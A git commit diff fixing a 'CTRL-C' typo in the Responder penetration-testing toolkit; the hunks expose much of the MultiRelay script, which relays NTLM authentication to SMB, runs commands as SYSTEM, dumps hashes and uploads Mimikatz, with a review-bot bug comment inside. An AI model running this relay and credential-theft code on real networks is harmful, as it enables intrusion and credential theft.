Fixed instances of "CRTL-C" to "CTRL-C"

Randy Ramos 2017-04-22 14:40:19 -04:00
commit 44a4e495cc
3 changed files with 40 additions and 40 deletions


@ -214,7 +214,7 @@ def IcmpRedirectSock(DestinationIP):
def FindWhatToDo(ToThisHost2): def FindWhatToDo(ToThisHost2):
if ToThisHost2 != None: if ToThisHost2 != None:
Show_Help('Hit CRTL-C to kill this script') Show_Help('Hit CTRL-C to kill this script')
RunThisInLoop(ToThisHost, ToThisHost2,OURIP) RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
if ToThisHost2 == None: if ToThisHost2 == None:
Show_Help(MoreHelp) Show_Help(MoreHelp)


@ -1,5 +1,5 @@
#!/usr/bin/env python #!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools # This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie. # created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com # email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify # This program is free software: you can redistribute it and/or modify
@ -33,7 +33,7 @@ except ImportError:
try: try:
import readline import readline
except: except:
print "Warning: readline module is not available, you will not be able to use the arrow keys for command history" print "Warning: readline module is not available, you will not be able to use the arrow keys for command history"
pass pass
from MultiRelay.RelayMultiPackets import * from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import * from MultiRelay.RelayMultiCore import *
@ -104,7 +104,7 @@ def ShowWelcome():
print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1) print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)
print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com' print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.' print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CRTL-C.\n' print 'To kill this script hit CTRL-C.\n'
print color('/*',8,1) print color('/*',8,1)
print 'Use this script in combination with Responder.py for best results.' print 'Use this script in combination with Responder.py for best results.'
print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n' print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n'
@ -136,7 +136,7 @@ def ShowHelp():
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)' print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)'
print color('help',8,1)+' -> Print this message.' print color('help',8,1)+' -> Print this message.'
print color('exit',8,1)+' -> Exit this shell and return in relay mode.' print color('exit',8,1)+' -> Exit this shell and return in relay mode.'
print ' If you want to quit type exit and then use CRTL-C\n' print ' If you want to quit type exit and then use CTRL-C\n'
print color('Any other command than that will be run as SYSTEM on the target.\n',8,1) print color('Any other command than that will be run as SYSTEM on the target.\n',8,1)
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
@ -185,7 +185,7 @@ def IsPivotOn():
def ConnectToTarget(): def ConnectToTarget():
try: try:
s = socket(AF_INET, SOCK_STREAM) s = socket(AF_INET, SOCK_STREAM)
s.connect((Host[0],445)) s.connect((Host[0],445))
return s return s
except: except:
try: try:
@ -195,7 +195,7 @@ def ConnectToTarget():
pass pass
class HTTPProxyRelay(BaseRequestHandler): class HTTPProxyRelay(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
@ -236,12 +236,12 @@ class HTTPProxyRelay(BaseRequestHandler):
if smbdata[8:10] == "\x72\x00": if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy ## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans() Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
@ -291,7 +291,7 @@ class HTTPProxyRelay(BaseRequestHandler):
class HTTPRelay(BaseRequestHandler): class HTTPRelay(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
@ -333,12 +333,12 @@ class HTTPRelay(BaseRequestHandler):
if smbdata[8:10] == "\x72\x00": if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Response. ## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans() Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
@ -366,7 +366,7 @@ class HTTPRelay(BaseRequestHandler):
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent." print "[+] SMB Session Auth sent."
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) smbdata = s.recv(2048)
@ -388,7 +388,7 @@ class HTTPRelay(BaseRequestHandler):
pass pass
class SMBRelay(BaseRequestHandler): class SMBRelay(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
@ -462,14 +462,14 @@ class SMBRelay(BaseRequestHandler):
#We're all set, dropping into shell. #We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user. #If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account. #This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account. #Let's kill that connection so we can force him to reauth with another account.
if RunCmd is None: if RunCmd is None:
s.close() s.close()
return None return None
else: else:
##Send logon failure, so our client might authenticate with another account. ##Send logon failure, so our client might authenticate with another account.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty() t = SMBSessEmpty()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
@ -516,15 +516,15 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del ShellOpen[:] del ShellOpen[:]
return False return False
## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$: ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
## Tree Connect ## Tree Connect
if data[8:10] == "\x73\x00": if data[8:10] == "\x73\x00":
GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session. GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$") t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
@ -538,7 +538,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del ShellOpen[:] del ShellOpen[:]
return False return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. # This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == "\x75\xcc": if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned." print "[+] Tree Connect AndX denied. Bad Network Name returned."
del ShellOpen[:] del ShellOpen[:]
@ -552,9 +552,9 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
print "[+] Looks good, "+Username+" has admin rights on C$." print "[+] Looks good, "+Username+" has admin rights on C$."
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
@ -588,7 +588,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
t.daemon = True t.daemon = True
t.start() t.start()
#Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation #Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
#to maintain MultiRelay alive and well. #to maintain MultiRelay alive and well.
count = 0 count = 0
DoEvery = random.randint(10, 45) DoEvery = random.randint(10, 45)
@ -622,8 +622,8 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del ShellOpen[:] del ShellOpen[:]
return None return None
##For all of the following commands we send the data (var: data) returned by the ##For all of the following commands we send the data (var: data) returned by the
##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore. ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
##We also clean up the command array when done. ##We also clean up the command array when done.
if DumpReg: if DumpReg:
data = DumpHashes(data, s, Target[0]) data = DumpHashes(data, s, Target[0])
@ -641,7 +641,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Upload: if Upload:
File = Upload[0] File = Upload[0]
if os.path.isfile(File): if os.path.isfile(File):
FileSize, FileContent = UploadContent(File) FileSize, FileContent = UploadContent(File)
File = os.path.basename(File) File = os.path.basename(File)
data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
@ -661,7 +661,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Cmd[:] del Cmd[:]
if RunAs: if RunAs:
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName) FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -673,11 +673,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Cmd[:] del Cmd[:]
if LCmd: if LCmd:
subprocess.call(LCmd[0], shell=True) subprocess.call(LCmd[0], shell=True)
del Cmd[:] del Cmd[:]
if Mimi: if Mimi:
if os.path.isfile(MimikatzFilename): if os.path.isfile(MimikatzFilename):
FileSize, FileContent = UploadContent(MimikatzFilename) FileSize, FileContent = UploadContent(MimikatzFilename)
FileName = os.path.basename(MimikatzFilename) FileName = os.path.basename(MimikatzFilename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -689,7 +689,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Cmd[:] del Cmd[:]
if Mimi32: if Mimi32:
if os.path.isfile(Mimikatzx86Filename): if os.path.isfile(Mimikatzx86Filename):
FileSize, FileContent = UploadContent(Mimikatzx86Filename) FileSize, FileContent = UploadContent(Mimikatzx86Filename)
FileName = os.path.basename(Mimikatzx86Filename) FileName = os.path.basename(Mimikatzx86Filename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -710,7 +710,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
del Pivot[:] del Pivot[:]
del Cmd[:] del Cmd[:]
else: else:
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName) FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -719,7 +719,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Status == True: if Status == True:
print "[+] Pivoting to %s."%(Pivot[0]) print "[+] Pivoting to %s."%(Pivot[0])
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
#shell will close. #shell will close.
@ -754,7 +754,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
##Let go with the command. ##Let go with the command.
if any(x in Cmd for x in Cmd): if any(x in Cmd for x in Cmd):
if len(Cmd[0]) > 1: if len(Cmd[0]) > 1:
if os.path.isfile(SysSVCFileName): if os.path.isfile(SysSVCFileName):
FileSize, FileContent = UploadContent(SysSVCFileName) FileSize, FileContent = UploadContent(SysSVCFileName)
FileName = os.path.basename(SysSVCFileName) FileName = os.path.basename(SysSVCFileName)
RunPath = '%windir%\\Temp\\'+FileName RunPath = '%windir%\\Temp\\'+FileName
@ -768,12 +768,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if data is None: if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n" print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n"
if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")# t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
data = s.recv(2048) data = s.recv(2048)
@ -788,7 +788,7 @@ def serve_thread_tcp(host, port, handler):
try: try:
server = ThreadingTCPServer((host, port), handler) server = ThreadingTCPServer((host, port), handler)
server.serve_forever() server.serve_forever()
except: except:
print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1) print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)
def main(): def main():
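Review bot: In the RunShellCmd hunk at -768,12 +768,12, the `if data is None:` branch only prints the dropped-connection message, and the next statement still evaluates `data[8:10]`, which raises TypeError when `data` is None. This assumes the two `if` statements sit at the same indent, which the rendering no longer shows. Chaining them as `elif data[8:10] == "\x2d\x34":` keeps the message and skips the slice on None. The function body starts and ends outside the hunk, so an enclosing try/except may already absorb the exception; if that is the intended exit, a short comment saying so on the `if data is None:` line would make it explicit.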


@ -293,7 +293,7 @@ def banner():
print "\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__ print "\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__
print "" print ""
print " Author: Laurent Gaffie (laurent.gaffie@gmail.com)" print " Author: Laurent Gaffie (laurent.gaffie@gmail.com)"
print " To kill this script hit CRTL-C" print " To kill this script hit CTRL-C"
print "" print ""